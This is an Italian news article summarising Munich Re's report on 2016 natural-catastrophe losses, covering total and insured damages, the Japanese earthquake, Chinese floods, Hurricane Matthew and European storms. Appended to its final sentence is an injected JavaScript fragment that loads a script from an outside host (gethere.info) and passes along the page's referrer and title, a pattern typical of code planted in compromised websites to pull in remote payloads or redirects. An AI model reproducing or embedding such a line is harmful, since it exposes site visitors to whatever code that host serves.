Munich Re: il 2016 è stato il più costosto degli ultimi 4 anni quanto a catastrofi naturali

Dopo tre anni relativamente tranquilli quanto a catastrofi naturali, il 2016 si attesta al di sopra della media degli ultimi 10 anni (145 mld danni totali di cui 45 assicurati).

Secondo quanto riporta Munich Re, il numero di terremoti devastanti e di potenti tempeste hanno fatto dell’anno appena concluso il più costoso degli ultimmi 4 anni.

I danni totali hanno raggiunto i 175 mld $, due terzi in più di quelli del 2015. I danni assicurati sono pari a circa 50 mld $, ovvero circa il 30% dei danni totali.

Sono circa 750 gli eventi rilevanti dell’anno, tra terremoti, tempeste, alluvioni, siccità e ondate di calore, contro una media di 590 negli ultimi dieci anni. Le vittime sono state 8.700, molto meno che nel 2015.

Si registra in particolare un grandissimo numero di inondazioni, che hanno pesato per il 34% del totale, rispetto ad una media del 21% degli ultimi dieci anni.

mre_cat16

E’ stato il terremoto in Giappone l’evento più costoso dell’anno: 31 mld $ di danni totali, di cui circa il 20% assicurati. Costose anche le alluvioni di giugno e luglio in Cina (danni per 20 mld di cui solo il 2% assicurati).

Il Nord America è stato colpito da molti eventi, di cui il peggiore è stato l’Uragano Matthew, che ha colpito in particolare Haiti, uccidendo 550 persone e causando danni anche nella costa orientale degli USA. I danni totali sono stati pari a 10.2 mld, di cui oltre un terzo assicurati.

Le catastrofi naturali non hanno risparmiato l’Europa: una serie di tempeste a fine maggio e inizio giugno, con piogge torrenziali in particolare in Germania, ma anche in Francia (con alluvioni e inondazioni sulla riva della Senna e a Parigi), ha causato danni totali per 6 mld, di cui circa la metà assicurati.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;